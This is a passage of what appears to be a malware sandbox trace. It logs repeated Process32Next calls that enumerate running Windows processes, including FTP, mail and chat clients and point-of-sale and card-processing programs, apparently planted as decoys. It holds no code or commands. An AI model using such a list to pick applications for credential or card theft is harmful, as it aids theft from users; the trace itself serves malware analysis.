th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.084] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.086] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0211.087] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0211.092] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0211.093] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.095] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0211.096] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0211.097] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0211.099] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0211.100] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0211.102] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.103] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0211.107] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0211.108] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0211.110] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0211.111] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0211.112] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0211.114] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0211.115] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0211.117] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0211.118] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0211.119] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0211.190] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0211.192] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0211.194] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0211.195] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0211.197] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0211.198] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0211.200] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0211.201] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0211.203] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0211.204] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0211.206] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0211.207] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0211.209] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0211.210] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0211.212] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0211.213] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0211.215] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0211.216] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0211.218] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0211.220] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0211.222] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0211.223] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0211.225] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0211.227] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0211.229] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0211.265] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0211.267] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0211.269] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0211.270] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0211.272] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0211.274] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0211.275] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0211.277] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0211.279] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0211.280] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0211.282] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0211.283] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0211.285] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0211.286] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0211.288] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0211.289] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0211.291] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0211.292] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0211.294] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0211.301] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0211.303] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0211.304] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0211.306] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0211.307] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0211.309] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0211.310] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0211.311] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0211.313] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0211.314] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0211.316] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0211.317] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0211.319] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0211.320] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0211.321] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0211.323] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0211.324] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0211.326] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: 